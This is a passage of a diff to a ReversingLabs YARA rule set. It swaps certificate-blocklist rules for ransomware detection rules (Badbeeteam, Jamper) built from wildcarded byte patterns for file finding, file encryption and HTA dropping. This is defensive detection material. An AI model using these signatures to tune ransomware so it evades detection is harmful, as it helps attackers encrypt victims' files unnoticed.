?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 + 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 + ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 + 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D + 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 + ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 + } + $enum_resources_2_p1 = { + 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? + ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? + 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? + ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? + 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? + ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 + 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C + 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 + 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? + ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A + 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 + ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 + A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? + ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 + } + $enum_resources_2_p2 = { + 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D + 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 + 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 + 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 + C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 + 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79 + ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 + 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? + ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 + 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 + 41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D + } + $enum_resources_2_p3 = { + 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2 + 8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B + CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C + 24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 + ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75 + ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47 + 84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D + 70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? + 83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ?? + ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA + } + $enum_resources_2_p4 = { + 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ?? + ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? + 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 + C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66 + 8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? + ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9 + ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? + ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D + 8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B + 6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ?? + 72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? + 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 + C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FreeVox SA" and pe.signatures[i].serial=="01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($encrypt_files_p*)) and ($find_files) and ( all of ($enum_resources_1_p*)) and ( all of ($enum_resources_2_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Badbeeteam ransomware." author = "ReversingLabs" - id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28" - date = "2023-11-08" - modified = "2023-11-08" + id = "39490b21-34b9-51cb-a3ed-672b3186a233" + date = "2020-11-13" + modified = "2020-11-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L423-L439" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Badbeeteam" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? + ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? + 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? + 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57 + 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? + ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 + ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? + 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D + } + $find_files_p2 = { + 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? + ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B + D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D + ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? + 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? + ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 + C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 + ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? + 51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? + ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C + 24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? + ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ?? + ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89 + 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8 + ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3 + E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3 + A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ?? + ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B + 70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ?? + 58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69 + } + $encrypt_files_p2 = { + 7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? + ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ?? + 8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56 + E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? + 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 + 6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74 + ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 + 83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? + ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8 + ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? + 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ?? + 72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44 + 24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? + ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24 + ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ?? + ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D + C3 + } + $drop_hta_file_p1 = { + 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89 + C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59 + 5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39 + 3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? + ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89 + 84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89 + 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? + ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? + 8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ?? + ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A + } + $drop_hta_file_p2 = { + 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 + 31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89 + F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D + 74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + 89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 + 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 + 8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ?? + ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ?? + 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "S2BVISIO BELGIQUE SA" and pe.signatures[i].serial=="55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($drop_hta_file_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Jamper ransomware." author = "ReversingLabs" - id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d" - date = "2023-11-08" - modified = "2023-11-08" + id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L441-L457" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Jamper" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D + ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? + 89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B + 45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83 + BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB 